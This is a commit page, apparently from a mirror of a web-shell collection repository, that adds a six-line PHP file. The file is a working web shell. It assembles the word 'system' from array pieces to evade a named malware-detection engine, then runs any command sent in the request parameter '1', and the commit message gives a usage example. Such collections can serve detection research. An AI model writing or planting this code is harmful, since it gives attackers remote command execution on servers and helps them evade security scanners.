mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
Create system2022-08-22-4.php
from: https://zhuanlan.zhihu.com/p/550150061 usage: xxx.php?1=whoami
This commit is contained in:
6
php/system2022-08-22-4.php
Normal file
6
php/system2022-08-22-4.php
Normal file
@@ -0,0 +1,6 @@
|
||||
<?php
|
||||
//ASRC伏魔引擎bypass
|
||||
$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
|
||||
$a = join($result);
|
||||
array_map($a,(array)$_REQUEST['1']);
|
||||
?>
|
||||
Reference in New Issue
Block a user